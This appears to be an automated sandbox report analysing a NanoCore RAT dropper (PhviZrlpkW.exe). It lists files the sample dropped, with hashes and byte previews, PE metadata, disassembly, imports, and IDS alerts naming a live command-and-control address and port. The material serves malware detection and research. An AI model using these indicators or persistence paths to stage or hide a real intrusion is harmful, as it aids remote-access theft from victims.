                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.0.4.<./.P.i.d.>.......

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC42.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4622
                  Entropy (8bit):4.405035055172041
                  Encrypted:false
                  SSDEEP:48:cvIwSD8zsVJgtWI9D/TWgc8sqYj48fm8M4JH4FSz+q8vQ71zC2d:uITfva/igrsqYxJlKG1zC2d
                  MD5:84250B7D1D034DB38E11A3F83DBE5A25
                  SHA1:2C9AF8EB330B513D2C42C26980EE994E1F6D46E6
                  SHA-256:E0E1A16228EA62FF2E12D7A2D9821C0F50948DC4EC0403DF952C09C4340275A4
                  SHA-512:113313843B1AE96B5C6699CBE37A1A5085D0AFFAA359693F2B69B052C2213ECA5C431633A60AE512491F85F17E8EAA61D58F4F19120A7CF321495E0E51D29844
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1896928" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                  C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo

                  Download File
                  Process:C:\Users\user\Desktop\PhviZrlpkW.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8155
                  Entropy (8bit):7.182663154059607
                  Encrypted:false
                  SSDEEP:192:darcitQvArWiPvoob95WlOPrifKTndVi/sv6fLtNI7ypzV:uCYrNPvoavPrifKzdo06hNI7q
                  MD5:67DF8B0B7F398320F69AA06DD324AABD
                  SHA1:EFEA18F4A780A5BE154E40A5A9C8535782D11AF2
                  SHA-256:244F2A16593E9A58DC56D66E8324BF0A019628C096CCF16D5355FF06265104CE
                  SHA-512:61F103CDECAA9575E6FA5B6DD4922B0E992CF0B01D4004B554AD9127539513ED825B7BE02D12999D748F0E5F34D76666104B6D0A9822C03E5A1F43EA6767D01A
                  Malicious:false
                  Reputation:low
                  Preview:.705m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e....aboZf`Z\V.v...`ZYaZCV.v.j^YV.}.lZAU.w.`Z\^.q.iY.T.}.m^.q.[WlT.}....i.W.y.R.}.^.y.W.q.......XW..Mc.....\7!.K.y.a..`.....Z...Jo.......\GB.Gg.u......X.B.Kg.v......Pp..Nd.w.....\...Ke.}.....Y...Ko.p......G8.u....0<..480fP.401Y7a^?X580..D;.g.....A4...Tgn.`...G.X0P0.80..3cg.a.p0..D.`...igen.a..@.b.e.kX.013^3gR7]804p.F8.a.c..q.ad.G<n.`..D2..qb.e...knj..o.00`...)ecXg`Z]^.q.iYXk^OV.}.lZPU.w.`ZE^.q.iY]T.}.mR.R.t.lT.}._\hR.t...R.}.^.y.W.y.R.u......ZR..Jo....\5$.O

                  C:\Users\user\AppData\Local\Temp\nse83F1.tmp

                  Download File
                  Process:C:\Users\user\Desktop\PhviZrlpkW.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):412536
                  Entropy (8bit):7.742692963191059
                  Encrypted:false
                  SSDEEP:12288:BRxkjTLz3xjDWVfJQ9qCU/vfVUgzshA4K9Wx:Ne9DGJQ9qXd4pKS
                  MD5:45976AFF5588384336C2E3D34526DAC1
                  SHA1:19586AA0CEA35DDEE5E7EFBE097A3E9BCE24C46D
                  SHA-256:265CB23E00182EA146217F6E1F14AE29BA83C11D218F67CBEBE4668B165CE23D
                  SHA-512:77A8205B700A90E46924FD1FE342D296A1BC9A2D5C8AE928090130CC6EE7F9B00078A8F9D79B753CE792E7F565967DC78222954845626D518F6FBCCBFFE2FD2B
                  Malicious:false
                  Preview:.6......,........................%.......5.......6..............................................................................T...........................................................................................................................................................G...............K...j...............................................................................................................................O...........p...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe

                  Download File
                  Process:C:\Users\user\Desktop\PhviZrlpkW.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):82432
                  Entropy (8bit):6.3796829712891165
                  Encrypted:false
                  SSDEEP:1536:VAYSS9siqxKZXtrcbYoo526WIHgnlcdrzDSQnABsScD9:+YdyxKzxWxsScD
                  MD5:64F982758878F6A97ED4B3D99CFBD371
                  SHA1:56E0222B9D025CCDB4FFD6BE443EC11D042D4993
                  SHA-256:BE58EBBA3239A9AF70FD8E1FFDF426EA89855574FF8B38794262D445B4EB351B
                  SHA-512:BA592967E39EE53682CDF87A9BDD943F536321D1014DF1139531B73AF28B71CE596175B698A090E4306F7BB0C86694B822A1B57E13A879DD034F3ADED6E5D117
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 65%
                  • Antivirus: Virustotal, Detection: 52%, Browse
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..}K.}K.}K.....}K.....}K......}K....}K.}J..}K.....}K.....}K.Rich.}K.................PE..L...+U.c............................q5............@.......................................@..................................#..........................................................................................|............................text............................... ..`.rdata...1.......2..................@..@.data....B...@......................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\tthfqfao.aa

                  Download File
                  Process:C:\Users\user\Desktop\PhviZrlpkW.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):307935
                  Entropy (8bit):7.985923940553015
                  Encrypted:false
                  SSDEEP:6144:2hXx4RjTF5mqJlX4e3DljJJ3WJPksJQrCQXq1IzQ1/V/HnPfYuUJSrk:2RxkjTLz3xjDWVfJQ9qCU/vfVUp
                  MD5:ED01FB080A7C07E4B8ADEC8148D0C434
                  SHA1:81474DD1BD248E9D080D55495DB795B4C52CC57D
                  SHA-256:AAAFF8393BFBBB2AD8865ECBEC0989162825F52184FB305FB0846D0C2C0D9654
                  SHA-512:F5FB047014EB631A0EA91064D0C440A9489F50CC4160DBAC507AEBD5B58D752112F1C69AE15F81A136C51D962FE4E478CDEC52C8A9B7411C110076C09F99EA78
                  Malicious:false
                  Preview:.....+V..e. .@...N;.:R....9(..6&._...kj.A...eL.a.d........-.........zx#..p.....j..j...>!.%8...)~..'Q.T.A...-....P..c....../b...e@.KKX.=....k....r...T_......".L.g!....q....N3...+.td.,.f >.bs..R,..]4W...G@G...k`.LF...q.7Ih.....>]8..4..x.]...{.......+M..e!.C@....N;.:.....9."[t.._...kcAA...ez.a.dM..........>......j..n.{...0..O.D..(..2[@.t.o ..A..e.R...?...ZM&.c .........M.g.N^.t.5...p..&.+.u.;. .....mLW.2..<..9...a.....).iHE&E.c..Y{"b..\3..5..F"3...#...y.()u.{.......'Y...pA..[.3.x.]...{...Yq..+...e...@....NC.:.....9(..6&.......J.3..ewFa.d......m..>5...].....n...].q%.O.4/.(..b[@nt...OiA..e.?......fZ..I7....l....1OM..5N\./.5w3....&.+.u.;.......mLW.2..<..j...2.a.....).iHE&E.c..Y{"b..\3..M..."3...#...y.(pu.........'Y...pA..[.3.x.]...{.......+...e.p.@....N;.:.....9(..6&._...kj.A...eL.a.d...........>5...].....n.{...0..O.Dv.(..2[@.t.. .iA..e.?......fZM&.c..........M..oN\.t.5w3....&.+.u.;. .....mLW.2..<..j...2.a.....).iHE&E.c..Y{"b..\3..M..."3...#...y.(pu.....

                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):232
                  Entropy (8bit):7.024371743172393
                  Encrypted:false
                  SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                  MD5:32D0AAE13696FF7F8AF33B2D22451028
                  SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                  SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                  SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                  Malicious:false
                  Preview:Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.

                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8
                  Entropy (8bit):3.0
                  Encrypted:false
                  SSDEEP:3:OjS:Ou
                  MD5:FDECF7936CC694269FF8F1961A68ADBB
                  SHA1:0BC2E2B015FB7A83E00CD0C8CFE08D25B5A60F6D
                  SHA-256:D1629F7944B42A620D3D35FFAA86125EC31C4E57D57EC0408CD71BCCD86E1E5B
                  SHA-512:A010C551B8E6885B903A388CC90579A8D5FAD24C900CA813DD044C57CED4B36E8812FD5FE9B57C0420DBBF8574BDEF2D6342FAC1C89C2207D2FC9E8127BF9DEF
                  Malicious:true
                  Preview:...d4..H

                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):40
                  Entropy (8bit):5.221928094887364
                  Encrypted:false
                  SSDEEP:3:9bzY6oRDMjmPl:RzWDMCd
                  MD5:AE0F5E6CE7122AF264EC533C6B15A27B
                  SHA1:1265A495C42EED76CC043D50C60C23297E76CCE1
                  SHA-256:73B0B92179C61C26589B47E9732CE418B07EDEE3860EE5A2A5FB06F3B8AA9B26
                  SHA-512:DD44C2D24D4E3A0F0B988AD3D04683B5CB128298043134649BBE33B2512CE0C9B1A8E7D893B9F66FBBCDD901E2B0646C4533FB6C0C8C4AFCB95A0EFB95D446F8
                  Malicious:false
                  Preview:9iH...}Z.4..f..... 8.j....|.&X..e.F.*.

                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):327432
                  Entropy (8bit):7.99938831605763
                  Encrypted:true
                  SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                  MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                  SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                  SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                  SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                  Malicious:false
                  Preview:pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7

                  C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):82432
                  Entropy (8bit):6.3796829712891165
                  Encrypted:false
                  SSDEEP:1536:VAYSS9siqxKZXtrcbYoo526WIHgnlcdrzDSQnABsScD9:+YdyxKzxWxsScD
                  MD5:64F982758878F6A97ED4B3D99CFBD371
                  SHA1:56E0222B9D025CCDB4FFD6BE443EC11D042D4993
                  SHA-256:BE58EBBA3239A9AF70FD8E1FFDF426EA89855574FF8B38794262D445B4EB351B
                  SHA-512:BA592967E39EE53682CDF87A9BDD943F536321D1014DF1139531B73AF28B71CE596175B698A090E4306F7BB0C86694B822A1B57E13A879DD034F3ADED6E5D117
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 65%
                  • Antivirus: Virustotal, Detection: 52%, Browse
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..}K.}K.}K.....}K.....}K......}K....}K.}J..}K.....}K.....}K.Rich.}K.................PE..L...+U.c............................q5............@.......................................@..................................#..........................................................................................|............................text............................... ..`.rdata...1.......2..................@..@.data....B...@......................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):6.1512123375745995
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:PhviZrlpkW.exe
                  File size:775369
                  MD5:565044691fedb39980cb814dc26f9ebd
                  SHA1:d92f48359c385fd03a419e583495ead52428654e
                  SHA256:3a1c1eabfbe52d5a822e95462e730775ea9eef9d8d653f3a1ff6904378ad3e0c
                  SHA512:ee459c0234c40c4b353f9ea6dbdb8297adac7b63727fb5bcfefbfa2404e0d14882d48656caf8f62897cba00cf7de20da19eb638bc3530e8d13fdb85cfaf58b3c
                  SSDEEP:6144:8Ya6SW0O0WqiBiGei7FTjUosytWnSS1SqY7WnoVhcOdN3eJznS/FK0Y4Zh/9VR9A:8Y6WqyTT5WnoLX9dK0XZh1RYCChaWKDW
                  TLSH:73F4E0537A00B2E5D8B044397C1AC1F34B99AE3999543E573AD4BF3F38B5123960A73A
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                  File Icon

                  Icon Hash:fcd4dcc4f0797979

                  Static PE Info

                  General

                  Entrypoint:0x403640
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:61259b55b8912888e90f516ca08dc514

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 000003F4h
                  push ebx
                  push esi
                  push edi
                  push 00000020h
                  pop edi
                  xor ebx, ebx
                  push 00008001h
                  mov dword ptr [ebp-14h], ebx
                  mov dword ptr [ebp-04h], 0040A230h
                  mov dword ptr [ebp-10h], ebx
                  call dword ptr [004080C8h]
                  mov esi, dword ptr [004080CCh]
                  lea eax, dword ptr [ebp-00000140h]
                  push eax
                  mov dword ptr [ebp-0000012Ch], ebx
                  mov dword ptr [ebp-2Ch], ebx
                  mov dword ptr [ebp-28h], ebx
                  mov dword ptr [ebp-00000140h], 0000011Ch
                  call esi
                  test eax, eax
                  jne 00007F3638DF5C5Ah
                  lea eax, dword ptr [ebp-00000140h]
                  mov dword ptr [ebp-00000140h], 00000114h
                  push eax
                  call esi
                  mov ax, word ptr [ebp-0000012Ch]
                  mov ecx, dword ptr [ebp-00000112h]
                  sub ax, 00000053h
                  add ecx, FFFFFFD0h
                  neg ax
                  sbb eax, eax
                  mov byte ptr [ebp-26h], 00000004h
                  not eax
                  and eax, ecx
                  mov word ptr [ebp-2Ch], ax
                  cmp dword ptr [ebp-0000013Ch], 0Ah
                  jnc 00007F3638DF5C2Ah
                  and word ptr [ebp-00000132h], 0000h
                  mov eax, dword ptr [ebp-00000134h]
                  movzx ecx, byte ptr [ebp-00000138h]
                  mov dword ptr [0042A318h], eax
                  xor eax, eax
                  mov ah, byte ptr [ebp-0000013Ch]
                  movzx eax, ax
                  or eax, ecx
                  xor ecx, ecx
                  mov ch, byte ptr [ebp-2Ch]
                  movzx ecx, cx
                  shl eax, 10h
                  or eax, ecx

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x64f00.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x3b0000x64f000x65000False0.2831088528774752data3.743561491677653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x3b3280x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144EnglishUnited States
                  RT_ICON0x7d3500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States
                  RT_ICON0x8db780x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States
                  RT_ICON0x970200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States
                  RT_ICON0x9b2480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States
                  RT_ICON0x9d7f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States
                  RT_ICON0x9e8980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States
                  RT_ICON0x9f2200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States
                  RT_DIALOG0x9f6880x100dataEnglishUnited States
                  RT_DIALOG0x9f7880x11cdataEnglishUnited States
                  RT_DIALOG0x9f8a80x60dataEnglishUnited States
                  RT_GROUP_ICON0x9f9080x76dataEnglishUnited States
                  RT_VERSION0x9f9800x23cdataEnglishUnited States
                  RT_MANIFEST0x9fbc00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                  Imports

                  DLLImport
                  ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                  SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                  USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.4193.31.30.1384972613652816766 02/03/23-23:19:06.285273TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497261365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384971313652816766 02/03/23-23:17:46.673206TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497131365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384971813652816766 02/03/23-23:18:21.376630TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497181365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384972113652816766 02/03/23-23:18:33.469715TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497211365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384971613652816766 02/03/23-23:18:07.532553TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497161365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384971413652816766 02/03/23-23:17:53.669627TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497141365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384972313652816766 02/03/23-23:18:47.034655TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497231365192.168.2.4193.31.30.138
                  193.31.30.138192.168.2.41365497022810290 02/03/23-23:17:30.731633TCP2810290ETPRO TROJAN NanoCore RAT Keepalive Response 1136549702193.31.30.138192.168.2.4
                  192.168.2.4193.31.30.1384972513652816718 02/03/23-23:18:58.945928TCP2816718ETPRO TROJAN NanoCore RAT Keep-Alive Beacon497251365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384970213652816766 02/03/23-23:17:32.574212TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497021365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384971713652816766 02/03/23-23:18:13.577404TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497171365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384971413652816718 02/03/23-23:17:52.672539TCP2816718ETPRO TROJAN NanoCore RAT Keep-Alive Beacon497141365192.168.2.4193.31.30.138
                  192.168.2.4193.31.30.1384971213652816766 02/03/23-23:17:40.364031TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497121365192.168.2.4193.31.30.138
